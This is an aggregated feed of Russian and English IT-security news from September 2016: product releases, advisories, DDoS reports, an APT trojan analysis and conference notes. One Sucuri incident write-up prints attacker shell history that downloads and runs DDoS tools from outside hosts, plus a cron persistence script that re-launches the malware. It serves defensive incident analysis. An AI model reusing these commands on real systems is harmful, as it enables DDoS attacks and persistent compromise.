Автоматическое масштабирование работает наилучшим образом при включенной функциональной группе Dynamic Routing (Динамическая маршрутизация). Подгружаемый программный модуль WebSphere для сервера HTTP обрабатывает статический набор серверов, а функциональная группа Dynamic Routing работает с инфраструктурой, в которой происходит постоянное добавление и удаление серверов, не требуя при этом постоянной перегенерации конфигурации подгружаемого программного модуля. Добавление этой функциональной группы производится на уровне контроллера. Dynamic Routing представляет собой один из аспектов Intelligent Management, пакета функциональности маршрутизатора по требованию (on demand router, ODR) для оптимизации распределения нагрузки HTTP-запросов.

В начало

В данном обучающем пособии были рассмотрены основные принципы функционирования профиля Liberty IBM WebSphere Application Server. Эти знания позволят вам во всеоружии подойти к процессу установки и настройки сервера Liberty для целей разработки.

Следующая статья в данной серии Руководство по установке локальной среды разработки Java EE для WebSphere Liberty..

В начало

Автор хотел бы выразить благодарность следующим сотрудникам IBM за помощь в написании данной статьи: Дэвиду Карри (David Currie), Россу Пэвиту (Ross Pavitt), Рику Осовски (Rick Osowski), Пэм Гайгер (Pam Geiger), Буди Дармавану (Budi Darmawan), Хизер Нельсон (Heather Nelson), Дэйву Тиссену (Dave Thiessen) и Рут Вилленборг (Ruth Willenborg).

В начало

WASdev – The WebSphere Application Server Developers Community

WebSphere Application Server (Distributed and IBM i operating systems), Version 8.5.5 documentation

orig: 2016-09-29 04:00:00 / http://www.ibm.com/developerworks/ru/library/1602_woolf-trs/1602_woolf1.html?ca=drs- (click post title)

Организация Raspberry Pi Foundation объявила о создании нового легковесного пользовательского окружения PIXEL (Pi Improved Xwindows Environment, Lightweight), являющегося ответвлением от рабочего стола LXDE. Проект развивался постепенно на основе переработки LXDE для воплощения задуманной концепции рабочего стола для Raspberry Pi и теперь достиг состояния полноценного продукта, готового для включения в состав дистрибутива Raspbian. Сборка Raspbian, переведённая на окружение PIXEL, уже доступна для загрузки.

orig: 2016-09-29 03:31:46 / http://www.opennet.ru/opennews/art.shtml?num=45238 (click post title)

Разработчики FreeBSD сообщили о переносе релиза FreeBSD 11 на 5 октября, после выявления проблем с безопасностью. Релиз перенесён в последний момент, уже после публикации финальных сборок на FTP-серверах проекта. Данные сборки признаны недействительными и будут обновлены. Всем пользователям рекомендуется не устанавливать появляющиеся на ftp-серверах сборки до официального анонса релиза.

orig: 2016-09-29 03:10:19 / http://www.opennet.ru/opennews/art.shtml?num=45239 (click post title)

    После недавней истории о схожести стоматологии и внедрения IDM наверняка все читатели подумали - «Да ну его нафиг, эта IDM-затея для мазохистов». Без небольшого мазохизма в этом деле никак (а уж представьте какие мазохисты CIO, что внедряют интеграционные шины), но у этой затеи есть очень, ОЧЕНЬ жирные плюсы. Такие жирные, что целым категориям организаций без IDM вообще никак. Руководству их служб ИТ и ИБ иногда может быть проще ходить с невылеченными зубами чем работать без IDM.

    Первая категория это Корпорации. Корпорации с большой буквы, у которых десятки тысяч офисных сотрудников. Подчеркиваю - именно офисных, 10 000 тысяч охранников и 20 000 кассиров, а так же 40 000 рабочих на нефтепромыслах - смело вычеркиваем. У таких компаний заявки могут возиться тележками, и носиться мешками (а мешки потом транспортироваться между московскими офисами на мотороллере - реальный кейс между прочим). После успешного внедрения IDM службы ИБ и ИТ могут чуть ли не подраться - выясняя чей вклад в проект больше (тоже реальный кейс одной из топовых в своей отрасли компаний в России, да что в России - в мире).

Вторая презентация с "Кода ИБ" была посвящена обзору технологий борьбы с внутренними угрозами. Точнее даже не совсем технологиям, а тому, что может стать источником данных для обнаружения внутренних угроз и на работу с чем и нужны то есть или иные технологии. Специально не ограничивался банальными DLP, которые уже немного набили оскомину (хотя набор функций у Infowatch Traffic Monitor меня впечатлил). Технологии борьбы с внутренними угрозами не ограничиваются только DLP. Об этом и презентация.

orig: 2016-09-29 01:59:06 / http://lukatsky.blogspot.com/2016/09/blog-post_75.html (click post title)

The persistence mechanism that I am going to describe today is not for the faint-hearted. When Windows 10 starts, lsass.exe loads Authentication Packages (AP) from the following registry location: HKLM\SOFTWARE\Microsoft\IdentityStore\Providers […]

orig: 2016-09-29 01:16:25 / http://www.hexacorn.com/blog/2016/09/29/beyond-good-ol-run-key-part-47/ (click post title)

Компания Sucuri опубликовала отчет об исследовании скомпрометированных сайтов по итогам второго квартала. На сей раз эксперты работали по более скромной выборке — около 9,3 тыс. сайтов, в очистке которых они приняли участие, тогда как в первом квартале они обследовали 11 тыс.

Согласно статистике Sucuri, разделение пострадавших по CMS-платформам осталось прежним, с незначительным изменением вклада основных участников: WordPress — 74%, Joomla — 16%, Magento — 5%, Drupal — 2%. Рейтинг CMS по утратившему актуальность ПО тоже мало изменился: WordPress — 55%, Joomla — 86%, Drupal — 84%, Magento — 96%, при этом Joomla и Drupal продемонстрировали рост доли уязвимых сайтов на 1 и 3 процентных пункта соответственно.

Исследование вновь показало, что основной точкой входа для хакеров являются уязвимости, которые чаще всего присутствуют в дополнительных модулях CMS. Согласно данным телеметрии, приобщенным к отчету Sucuri, на каждом современном WordPress-сайте в среднем установлено 12 плагинов. Тем не менее в отчетный период, как и в предыдущем квартале, взлом WordPress через плагин наиболее часто происходил по вине устаревших версий RevSlider (46% случаев), GravityForms и TimThumb (по 27%).

Sucuri также впервые представила результаты сопоставления своих находок с четырьмя широко используемыми черными списками. Как оказалось, в них внесены лишь 18% скомпрометированных сайтов, зафиксированных исследователями в период с апреля по июнь. При этом больше половины из них (52%) числятся в базе Google Safe Browsing; Norton SafeWeb распознает 38% находок Sucuri, попавших в черные списки, Yandex — 32%, McAfee SiteAdvisor — 11%.

Из полезных нагрузок, оставленных хакерами на взломанных сайтах, наиболее часто встречаются бэкдоры, которые в том или ином виде были обнаружены на 4234 сайтах, а также вредоносное ПО (3580 случаев) и спам с целью повышения рейтинга в поисковой выдаче (2282).

orig: 2016-09-29 00:32:31 / https://threatpost.ru/sucuri_podelilas_rezultatami_chistki_sajtov_vo_2_kvartale/18371/ (click post title)

Red Hat Security Advisory 2016-1944-01 - The Berkeley Internet Name Domain is an implementation of the Domain Name System protocols. BIND includes a DNS server ; a resolver library ; and tools for verifying that the DNS server is operating correctly. Security Fix: A denial of service flaw was found in the way BIND constructed a response to a query that met certain criteria. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS request packet.

orig: 2016-09-28 23:55:00 / https://packetstormsecurity.com/files/138894/RHSA-2016-1944-01.txt (click post title)

Red Hat Security Advisory 2016-1945-01 - The Berkeley Internet Name Domain is an implementation of the Domain Name System protocols. BIND includes a DNS server ; a resolver library ; and tools for verifying that the DNS server is operating correctly. Security Fix: A denial of service flaw was found in the way BIND constructed a response to a query that met certain criteria. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS request packet.

orig: 2016-09-28 23:33:00 / https://packetstormsecurity.com/files/138893/RHSA-2016-1945-01.txt (click post title)

Symantec Messaging Gateway versions 10.6.1 and below suffer from a directory traversal vulnerability.

orig: 2016-09-28 23:32:22 / https://packetstormsecurity.com/files/138891/symantecmg-traversal.txt (click post title)

Cisco Security Advisory - On September 22, 2016, the OpenSSL Software Foundation released an advisory that describes 14 vulnerabilities.

orig: 2016-09-28 23:24:00 / https://packetstormsecurity.com/files/138889/cisco-sa-20160927-openssl.txt (click post title)

Slackware Security Advisory - New bind packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, 14.2, and -current to fix a security issue.

orig: 2016-09-28 23:23:00 / https://packetstormsecurity.com/files/138888/SSA-2016-271-01.txt (click post title)

D-Link DWR-932B suffers from backdoor accounts, default WPS PIN, weak WPS PIN generation, and various other bad security practices and issues.

orig: 2016-09-28 22:22:22 / https://packetstormsecurity.com/files/138890/dlinkdwr932b-backdoorexec.txt (click post title)

Приказом Росстата от 5 сентября 2016 г. № 480 утверждены «Правила осуществления в Федеральной службе государственной статистики и ее территориальных органах внутреннего контроля соответствия обработки персональных данных требованиям к защите персональных данных, установленным Федеральным законом от 27 июля 2006 г. № 152-ФЗ «О персональных данных», принятыми в соответствии с ним нормативными правовыми актами и локальными актами Федеральной службы государственной статистики», которые вступили в силу 25 сентября 2016 года.

В целях осуществления внутреннего контроля соответствия обработки персональных данных (ПДн) требованиям к их защите, в Росстате и ее территориальных органах организовывается проведение плановых и внеплановых проверок условий обработки ПДн на предмет соответствия федеральному закону от 27 июля 2006 г. № 152-ФЗ «О персональных данных», принятыми в соответствии с ним нормативными правовыми актами и локальными актами службы (п.2).

Проверки проводятся на основании ежегодного плана или поступившего в Росстат письменного заявления субъекта персональных данных или его представителя о фактах нарушения правил обработки ПДн (внеплановые проверки).

Ежегодный план проверок разрабатывается и утверждается комиссией по организации обработки и защиты ПДн службы в Росстате и в ее территориальных органах (п.3), по каждой проверке устанавливается объект внутреннего контроля, проверяемый период, срок проведения проверки, ответственные должностные лица (п.4).

Основанием для проведения внеплановой проверки является поступившее в Росстат письменное обращение заявителя, содержащее информацию о фактах нарушения правил обработки ПДн (п.6), которая организуется в течение 5 рабочих дней со дня регистрации обращения (п.7), ее срок проведения не может превышать месяц со дня принятия решения о ней (п.8).

Члены Комиссии, получившие доступ к персональным данным в ходе проведения проверки, обеспечивают их конфиденциальность, не раскрывают третьим лицам и не распространяют их без согласия субъекта ПДн (п.9).

По результатам каждой проверки комиссиями проводится заседание, решения оформляются протоколом (п.10).

В течение 5 рабочих дней со дня окончания внеплановой проверки комиссия дает письменный ответ заявителю по поставленным в его обращении вопросам (п.11).

Мой комментарий: В документе описаны лишь организационные меры, и ничего не сказано о содержательной части работы комиссий. С моей точки зрения, наличие планов проведения контроля, заседания комиссий и их протоколы мало чем могут защитить персональные данные. Здесь всё-таки требуется комплексный подход с использованием разнообразных мер.

Источник: Консультант Плюс
http://www.consultant.ru/cons/cgi/online.cgi?req=doc&base=LAW&n=204604

orig: 2016-09-28 21:05:08 / http://rusrim.blogspot.com/2016/09/blog-post_64.html (click post title)

VLC Media Player version 2.2.1 suffers from a buffer overflow vulnerability.

orig: 2016-09-28 20:32:22 / https://packetstormsecurity.com/files/138906/vlcmediaplayer221-overflow.txt (click post title)

Exponent CMS version 2.3.9 suffers from a cross site scripting vulnerability.

orig: 2016-09-28 20:32:22 / https://packetstormsecurity.com/files/138892/exponentcms239-xss.txt (click post title)

Сильнейшие в истории атаки начались 16 сентября 2016 и продолжаются до сих пор - неизвестные злоумышленники пытаются парализовать работоспособность провайдеров защиты.

У специалистов есть основания полагать, что наблюдаемые потоки паразитного трафика феноменального объема являются частью массированной атаки, которой подвергся сайт журналиста Брайана Кребса, раскрывшего деятельность крупнейшего сервиса по осуществлению заказных DDoS-атак - vDOS.

Одна из крупнейших европейских хостинговых компаний OVH также подверглась ряду DDoS-атак, общая мощность двух из них достигала рекордных 1 Тб/с. По данным СМИ, атака была осуществлена с помощью ботнета, состоящего из 145 607 видеорегистраторов, способных обеспечить мощность 1,5 Тб/с, без техник усиления и отражения.

К такому же выводу пришли и специалисты DDoS-GUARD после обработки и анализа паразитного трафика: злоумышленники не использовали средств ампфликации, при этом генерируя потоки данных на несколько протоколов сразу. Комбинация TCP SYN flood и TCP Ack flood , UDP flood, а так же генерация GRE flood  стала серьезным испытанием для сети фильтрации провайдера, но благодаря грамотной  оперативной работе инженеров NOC удалось минимизировать последствия для клиентов.

(На графиках G - Гбит/сек)

«Мощность и сложность атак планомерно растет, поэтому для таких случаев у нас всегда зарезервирована возможность для "горячего" увеличения каналов», - прокомментировал ситуацию Алексей Кузик, глава NOC в DDoS-GUARD – «Интернет вступает в новую реальность, где провайдеры защиты должны действовать на опережение».

Всего с 16 сентября по текущий момент было зафиксировано 14 ddos-атак мощностью более 200 MPPS. Судя по всему, это еще далеко не конец истории. 

orig: 2016-09-28 18:13:51 / https://www.anti-malware.ru/news/2016-09-28/21077 (click post title)

A few weeks ago we ran an experiment to see how long it would take for some IPv4-only and IPv6-only servers to be compromised via SSH brute force attacks.

We configured five cloud servers on Linode and Digital Ocean with the root password set to “password.”  The idea was to see how long it would take before the servers were hacked.

My experiment: Setting up an ipv4 and an ipv6 server in the cloud. SSH open with root password “password”. How long until they are hacked?

— Daniel Cid (@danielcid) September 6, 2016

The IPv4 experiment did not last very long because within 12 minutes the first server was hacked. The others were also hacked shortly afterward.

The IPv6 servers, however, had much better results. After one week, they have not been attacked (much less compromised). What we can draw from this is that the obscurity of IPv6 helps to minimize the noise of attacks. Most likely, this is because it is more difficult to map the range of IPv6 addresses (2^128) than it is with the range of IPv4 addresses (2^32).

That was not the end of our SSH brute force experiment. Shortly after the initial compromise (before we had the time to kill the server) we got this notice from Digital Ocean:

We got alerted that SSH-TEST-SERVER-X was participating in a SYN flood along with 4 other droplets on 3 other customers aimed at 118.184.XX.YY. This was happening at about 800mbps or so; after pulling a tcpdump and validating the pcap we took action on all 4 droplets.

Right now the droplet has the networking disabled to stop the outgoing attack, and please let us know if we can help resolve this.

Regards,

Trust & Safety,
Digital Ocean Support

Oh shoot! Our little experiment server was used to DDoS a poor victim in China. We didn’t expect attackers to use it so quickly after the initial compromise. Immediately we copied the hard drive from the experiment server and shut it off. We then performed an investigation to find out what the attackers had done.

Immediately we copied the hard drive from the experiment server and shut it off. We then performed an investigation to find out what the attackers had done.

First of all, we looked at the logged history and found some of the commands they executed:

 7 cat /proc/cpuinfo
 8 ls
 9 wget http://werwolf.3x.ro/dos.py
 10 ls
 11 python
 12 ls
 13 python dos.py
 14 python dos.py http://exploratoriivrancei.blogspot.ro
 15 ls
 16 wget arhivewolf.3x.ro/down.pl
 17 perl down.pl 92.80.190.15
 18 cd
 19 ls
 20 passwd
 21 uptime
 22 free -m
 23 uptime
 24 wget http://wolf.16mb.com/viteza.py
 25 python viteza.py

Here we can see three tools being downloaded – dos.py, down.pl and viteza.py – which are used for specific DDoS attacks.

Truitt Allen, from our SOC group, came to help with the investigation. In addition, he found backdoors and a cron job running every hour to re-enable the malware in case it gets removed:

 # cat /etc/cron.hourly/gcc.sh
 #!/bin/sh
 PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
 for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
 cp /lib/libudev.so /lib/libudev.so.6
 /lib/libudev.so.6

The init scripts were modified to load the malware during boot:

 /etc/rc.d/rc2.d
 /etc/rc.d/rc2.d/S90yxruhbcgee
 /etc/rc.d/rc3.d
 /etc/rc.d/rc3.d/S90yxruhbcgee
 /etc/rc.d/rc5.d
 /etc/rc.d/rc5.d/S90yxruhbcgee
 /etc/rc.d/init.d/yxruhbcgee
 /etc/rc.d/rc1.d
 /etc/rc.d/rc1.d/S90yxruhbcgee
 /etc/rc.d/rc4.d
 /etc/rc.d/rc4.d/S90yxruhbcgee

Furthermore, the scripts executed a binary at /usr/bin/yxruhbcgee (which seems to be randomly created). After some inspection of that binary, we recognized it as the infamous Linux/Xor.DDoS malware. We won’t go through our investigation of it, as Bart already did it very well on the link above. We recommend reading about it, but as the name suggests, it is another DDoS toolkit that runs on Linux.

What’s even scarier is that the attackers injected all hacked servers with the same type of code, likely to be used for the same purpose (DDoS).

The first lesson we learned is to be more careful with these experiments. Next time, we will disable networking right away after being compromised. We also learned some interesting facts about the benefits of obscurity through IPv6 as it helps reduce the noise of attacks.

In addition to this, SSH brute force attacks are clearly still persistent, with attacks using compromised servers almost immediately to perform DDoS attacks. When you add the power of these servers with hacked IoT devices, you probably have enough power to generate large attacks like the one that took down Brian Krebs last week.

orig: 2016-09-28 17:30:58 / http://feedproxy.google.com/~r/sucuri/blog/~3/bzBDxWWOgNw/ssh-brute-force-compromises-leading-to-ddos.html (click post title)

Межсайтовый скриптинг — один из долгожителей в мире уязвимостей, этот баг с завидной регулярностью всплывает в веб-приложениях, несмотря на широкий выбор специализированных сканеров и обилие полезных рекомендаций для разработчиков.

Google тоже решила внести свою лепту в борьбу с XSS-атаками, выпустив два инструмента, призванных помочь разработчикам в повышении качества политик веб-приложений, использующих стандарт Content Security Policy (CSP).

Политика защиты контента в том или ином виде реализована в большинстве браузеров, где она помогает определять, какое содержимое следует или можно грузить. CSP-механизм предназначен для защиты от атак, предполагающих внедрение вредоносного контента, в частности, от XSS.

Новые инструменты от Google, именуемые CSP Evaluator и CSP Mitigator, помогут разработчикам визуализировать и ввести в действие CSP-политику. Google надеется, что использование новинок поможет не только бороться с XSS-атаками, но также закрыть в CSP лазейки, позволяющие с легкостью обойти эту защиту. Так, недавно эксперты компании обследовали более 1 млрд доменов и обнаружили, что в 95% случаев реализация CSP не работает против XSS как надо.

«Одной из причин этого является тот факт, что из 15 доменов, обычно включаемых разработчиком в белый список для загрузки внешних скриптов, 14 выказывают характерные особенности, позволяющие обойти CSP-защиту, — пишут исследователи в блоге Google. — Мы сочли, что ситуацию нужно улучшить и помочь веб-платформам в полной мере реализовать потенциал CSP».

CSP Evaluator, по словам Google, поможет разработчикам уяснить, как именно политики повлияют на безопасность веб-приложения, а также увидеть огрехи в конфигурации. Этот инструмент верой и правдой служит специалистам по ИБ в самой компании, он работает в тесном взаимодействии с CSP-политикой, предполагающей использование нонс-параметров.

«Даже при наличии такого полезного инструмента составить белый список надежных скриптов для сложного приложения зачастую практически невозможно — из-за большого количества популярных доменов с ресурсами, позволяющими обойти CSP, — поясняют представители Google. — Здесь уместно использовать концепцию CSP с нонс-параметрами. Вместо занесения в белый список всех локаций разрешенных скриптов часто проще бывает модифицировать приложение таким образом, чтобы доверие разработчика к скрипту можно было доказать с помощью нонса — непредсказуемого одноразового токена, который должен совпасть со значением, заданным политикой».

Аналогичный подход, по свидетельству Google, уже используется в ряде ее веб-приложений и оговорен в документации для разработчиков, с инструкциями и вариантами политик. В одном из опубликованных документов Google также привела примеры изменения кода.

CSP Mitigator выполнен как расширение Chrome, его можно использовать для проверки приложения на совместимость с CSP-политикой, использующей нонсы. «Это расширение можно активировать для любого префикса URL, и оно будет собирать данные обо всех шаблонах программирования, которые необходимо привести в соответствие с CSP, — поясняет Google. — Эта процедура включает идентификацию скриптов, не имеющих корректного нонс-параметра, обнаружение встроенных обработчиков событий, URI-идентификаторов javascript: и некоторых других неприметных шаблонов, которые могут нуждаться в перепроектировании».

Google также объявила о включении CSP в программу вознаграждений Patch Reward Program. Премированию подлежат те исследования, которые помогут обеспечить совместимость open-source-платформ с CSP-политикой, полагающейся на нонсы.

orig: 2016-09-28 17:06:07 / https://threatpost.ru/new-google-tools-help-devs-improve-content-security-policy-protection/18364/ (click post title)

Разработчики Mozilla сообщили о расширении инициативы Test Pilot, в рамках которой пользователями предоставлена возможность оценить и протестировать экспериментальные возможности, развиваемые для будущих выпусков Firefox. Для участия в программе необходимо установить специальное дополнение Test Pilot (учетная запись в системе Firefox Account при этом не обязательна), в котором будет доступен список предлагаемых для тестирования возможностей.

orig: 2016-09-28 16:20:22 / http://www.opennet.ru/opennews/art.shtml?num=45237 (click post title)

НПО РусБИТех, развивающее дистрибутив Astra Linux, совместно с компанией ПараТайп представили новый набор общедоступных шрифтов PT Astra Serif и PT Astra Sans (с засечками и без засечек), который можно использовать в качестве метрического аналога шрифта Times New Roman. Шрифты опубликованы в формате OT-TTF под свободной лицензией OFL (Open Font License), допускающей свободное распространение, модификацию и бесплатное использование даже в коммерческих проектах, но запрещающей переименовывать и продавать шрифт как отдельный продукт.

orig: 2016-09-28 16:08:28 / http://www.opennet.ru/opennews/art.shtml?num=45236 (click post title)

Доступен релиз Proxmox Virtual Environment 4.3, специализированного Linux-дистрибутива на базе Debian GNU/Linux, нацеленного на развертывание и обслуживание виртуальных серверов с использованием LXC и KVM, и способного выступить в роли замены таких продуктов, как VMware vSphere, Microsoft Hyper-V и Citrix XenServer. Размер установочного iso-образа 510 Мб.

orig: 2016-09-28 15:34:48 / http://www.opennet.ru/opennews/art.shtml?num=45235 (click post title)

Компания Solar Security, сообщает о выходе Solar Dozor 6.2, новой версии первой отечественной DLP-системы. Идеология Solar Dozor базируется на том, что эффективное DLP-решение должно в первую очередь обеспечивать простоту принятия решений и возможность оперативного реагирования на инциденты.

Поэтому одним из стратегических векторов развития продукта является повышение удобства использования системы: простота составления поисковых запросов, наглядность дашбордов, интуитивно понятный интерфейс.

В рамках данной стратегии в версии Solar Dozor 6.2 в дополнение к привычному рабочему столу аналитика реализована функциональность под названием «Рабочий стол руководителя». Это раздел консоли, который предоставляет руководителю подразделения ИБ или бизнес-заказчику DLP-системы возможность быстро получить всю необходимую информацию для анализа оперативной обстановки.

В отличие от рабочего стола аналитика, основной целью рабочего стола руководителя является помощь начальнику ИБ-отдела в управлении подчинёнными, эксплуатирующими Solar Dozor. Руководитель службы ИБ может увидеть на одном экране сводную информацию о количестве событий и инцидентов, о том, сколько из них обработано или находится на рассмотрении, кто отвечает на разбор того или иного события, а также может просматривать данные последних отчетов, сформированных офицерами безопасности.

Графические виджеты на рабочем столе руководителя также отличаются от тех, что размещены на рабочем столе аналитика. Они дают более высокоуровневое и обобщенное представление о ситуации в компании, динамике числа инцидентов и уровня угроз. Виджеты сгруппированы таким образом, чтобы предоставить руководителю службы ИБ все необходимые данные для быстрой оценки и внесения корректировок в работу аналитиков, проводящих разбор инцидентов.

В качестве еще одного шага на пути к повышению эффективности использования DLP в Solar Dozor реализована возможность поиска и отображения связанных сообщений мессенджеров в виде бесед. Этот привычный и понятный способ представления позволяет моментально оценить, является ли срабатывание системы инцидентом, а также упрощает и ускоряет проведение расследований.

Для того чтобы служба безопасности была уверена в том, что все рабочие станции сотрудников находятся под контролем, Solar Dozor 6.2 отслеживает и отображает текущий статус активности агентов. При просмотре списка персон, которые входят в соответствующую группу, или карточки персоны, офицер безопасности получает информацию о том, установлен ли агент на соответствующей рабочей станции, и активен ли он.

«Многие DLP-системы до сих пор остаются своеобразным «черным ящиком» для пользователей, они точечно уведомляют о событиях ИБ, но не помогают офицеру безопасности сформировать единую картину того, что происходит в организации. Мы заботимся о том, чтобы аналитика в Solar Dozor была прозрачной и понятной, и для этого постоянно работаем над улучшением отчетов, – рассказывает Игорь Ляпунов, генеральный директор компании Solar Security. – Рабочий стол руководителя является очередным шагом в этом направлении: он сводит воедино всю верхнеуровневую аналитику, обеспечивая полноту и целостность видения ситуации в компании».

orig: 2016-09-28 15:28:59 / https://www.anti-malware.ru/news/2016-09-28/21076 (click post title)

Не знающая устали APT-группировка, которая, как предполагают, имеет отношение к взлому DNC и ряду целевых атак на военные и политические ведомства на Западе, пустила в ход новый троянец Komplex для заражения компьютеров на базе OS X, используемых в аэрокосмической отрасли.

Группировка, известная как Sofacy, APT28, Fancy Bear, Sednit и Pawn Storm, распространяет троянца через целевые фишинговые рассылки. Приманкой служат сведения о российской космической программе. Начальный анализ атаки предоставили исследователи из Palo Alto Networks.

«Apple обеспечивает весьма устойчивую защиту OS X. Единственное слабое звено — это сам пользователь. Поэтому люди всегда являются основной целью атаки, какой бы операционной системой они ни пользовались», — сказал Райан Олсон (Ryan Olson), директор по разведке в Unit 42 Palo Alto Networks.

Sofacy активна уже более двух лет; ей приписывают атаки на НАТО, а также высокопоставленные цели из европейских военных и политических организаций. Не так давно ИБ-компания Crowdstrike обвинила Sofacy во взломе Национального комитета Демократической партии США, в результате которого были похищены данные исследований демократов о политическом оппоненте — кандидате в президенты от Республиканской партии Дональде Трампе.

Вредоносные email-сообщения содержат единственное вложение, в котором заключен вредоносный компонент в виде исполняемого файла, а также скрипты и PDF-документ. Кликнув вложение с Komplex, пользователь загружает 17-страничный PDF-документ (roskosmos_2015-2025.pdf) на свой Mac-компьютер.

«Если рассуждать с точки зрения психологии, человек, ожидавший открыть PDF-файл, не заподозрит ничего, если PDF-файл действительно откроется», — сказал Олсон.

«Инструмент способен загружать на пораженный компьютер дополнительные файлы, запускать программы и удалять файлы, а также напрямую взаимодействовать с оболочкой системы», — написали авторы отчета Дэни Креус (Dani Creus), Тайлер Хафпоп (Tyler Halfpop) и Роберт Фальконе (Robert Falcone).

В анализе троянца, подготовленном силами Unit 42, говорится: «Дроппер Komplex сохраняется в системе как «/tmp/content» (SHA256:96a19a90caa41406b632a2046f3a39b5579fbf730aca2357f84bf23f2cbc1fd3) и отвечает за установку третьего исполняемого файла и обеспечение его запуска при каждой загрузке ОС».

Komplex использует ряд механизмов обхода систем безопасности и сэндбокса — например, GET-запрос в Google для определения подключения к Интернету. «Вредоносный компонент будет неактивен до тех пор, пока не получит от Google ответ на свой HTTP-запрос; таким образом, Komplex будет связываться с сервером атаки только при наличии интернет-подключения», — пишут исследователи.

PDF-документ написан на русском языке и якобы предлагает ознакомиться с планами на будущее российской космической программы с 2016 по 2025 год. Олсон сказал, что ему неизвестно, какая страна может стоять за созданием Komplex.

У троянца, впервые замеченного в начале августа, много общего с Carberp — этот Windows-зловред также использовался Sofacy. Техники, применяемые Carberp и Komplex, похожи в плане использования криптографии и организации работы командного сервера, отметил Олсон.

«В ходе анализа мы определили, что Komplex использовался в одной из более ранних кампаний, направленной против пользователей компьютеров под OS X; для доставки вредоносного компонента зловред эксплуатировал уязвимость в ПО MacKeeper», — заключили исследователи.

Разработка Komplex, уверены в Unit 42, — это «признак того, что Sofacy совершенствует свои компетенции в проведении мультиплатформенных атак».

orig: 2016-09-28 15:16:54 / https://threatpost.ru/sofacy-apt-targeting-os-x-machines-with-komplex-trojan/18360/ (click post title)

Добрый вечер, дорогие читатели! 8 сентября в Красноярске в первый раз прошел Код ИБ, а я была куратором конференции. Это было здорово! Стоит отметить, что мультибрендовые конференции у нас не проходят, поэтому формат мероприятия для города уникальный. Все, что у нас сейчас есть - это пара докладов на Антитерроре весной и на Айтикоме осенью, ну и роадшоу различные. Поэтому Код ИБ ждали все. Особенность красноярского сообщества ИБ специалистов - все друг друга знают. Поэтому атмосфера была почти домашней, я встретила коллег, знакомых, однокурсников.

В прошлом году мне посчастливилось выступать в Иркутске и Новосибирске, и как это будет в итоге, я примерно представляла. Надежды оправдались! Безусловно есть определенные недочеты, которые нужно будет учесть в следующий раз, но их не так уж много.

Организация мероприятия

2. Кофе-брейки и обед были красиво сервированы. Еда была вкусной, хотя, на мой субъективный взгляд, формат Хилтона лучше (там шведский стол). 

3. Было очень много конкурсов и подарков, практически никто не ушел без приза, хотя бы и символического. Это мотивировало многих досидеть до последнего доклада.

Выступления

Спикеры были хороши. На пленарной части выступали Максим Степченков (IT-Task), Евгений Климов (президент RISSPA) и начальник отдела технической защиты информации ГУВД по Красноярскому краю Владимир Владимирович Бабин. В университете я проходила у него в отделе производственную практику, где и познакомилась впервые с темой персональных данных. В такой приятной компании мы провели на сцене чуть больше часа. Этого было очень мало! К сожалению, участники не задавали нам вопросов, только внимательно слушали. Думаю, на следующий год нужно больше работать с залом, задавать вопросы участникам, выводить их на диалог. Мне кажется, было бы правильно либо увеличить время пленарной части, либо добавить в послеобеденную часть конференции секцию ответов на вопросы. 

После обеда интересным было выступление представителя Ростелекома (Тимура Ибрагимова). Радует, что в докладе присутствовала не только реклама, но и небольшой ликбез на тему ддос атак. Стоит отметить, что в каждом докладе на конференции было много интересного, совсем уж голимой рекламы не было. 

Мысли, которые интересно подумать

1. Очень многие атаки являются целевыми. Нужно почитать больше про АРТ.

2. Вы украли бы деньги у своей компании (при условии гарантированной безнаказанности)? (Максим Степченков о выполнении норм ИБ сотрудниками)

3. Центры очистки от Лабаратории Касперского (поизучать вопрос).

4. СТАР - бесплатная программа от Fortinet.

5. По Красноярску - низкий процент установки антивируса на почтовый сервер (Dr Web). 

6. Более 80% шифровальщиков проникают через почту (ESET)

7. У выступающего из Check Point был вирус на флешке с презентацией :).

8. Дерзкое заявление представителя Касперского в зал: "Кому нужна маленькая компания в Красноярске, думаете Вы?" Эм, мы здесь не считаем себя окраиной мира, у нас будет Универсиада :)

9. Трансграничная передача как альтернатива хранения по 242-ФЗ? (Oracle).

Вот и все впечатления, если кратко. Что хотелось бы изменить? Думаю, стоит уделить больше внимания ответам на вопросы в начале и конце конференции и поменять концепцию мастер-класса в конце - проводить в формате дискуссии. В остальном все было просто здорово! Аудитория состояла из специалистов самых разных отраслей, вопросы после докладов лились рекой. Первый раз прошел отлично, будем ждать Код ИБ в 2017!

Фото взяты с сайта codeib.ru

https://vk.com/kshudrova - ссылки на свежие посты и интересные материалы других авторов

orig: 2016-09-28 15:13:00 / http://feedproxy.google.com/~r/blogspot/IAkcs/~3/mPCF0ymwPuI/8-2016.html (click post title)

Уважаемые коллеги, сообщаем что 23 сентября 2016 года программный комплекс «Центр контроля информационной безопасности Р-Вижн» официально внесен в реестр российского программного обеспечения — https://reestr.minsvyaz.ru/reestr/89561/.

Напомним, что с 1 января 2016 года государственные органы РФ обязаны приобретать продукты отечественных разработчиков ПО, руководствуясь единым реестром российских программ для электронных вычислительных машин и баз данных. Реестр представляет собой классифицированный список программных продуктов. Целью его создания является — расширение использования российского ПО и оказание государственной поддержки правообладателям ПО.

SGRC — это центр контроля информационной безопасности, состоящий из объединенных и интегрированных в единое решение модулей системы R-Vision, и предназначенный для консолидации информации из различных процессов информационной безопасности с целью поддержки руководителя в принятии решений по дальнейшему стратегическому и тактическому управлению ИБ в компании.

Модуль предназначен для контроля, аудита и оценки соответствия организации различным нормативным и законодательным требованиям в области информационной безопасности.

Модуль предназначен для организации процесса управления инцидентами информационной безопасности и анализа информации, относящейся к инциденту.

С помощью модуля можно вести учет и регистрацию событий и инцидентов, хранить всю информацию по инцидентам и результатам их расследования в единой базе данных, а также подготавливать необходимую отчетность.

Модуль предназначен для оценки и управления рисками информационной безопасности в соответствии с требованиями и рекомендациями российских и международных стандартов (ISO, OCTAVE, NIST, СТО БР, PCI DSS).

С помощью модуля можно составить модель угроз, провести оценку и анализ рисков, сформировать план обработки рисков, оценить экономический эффект и обосновать бюджет на информационную безопасность.

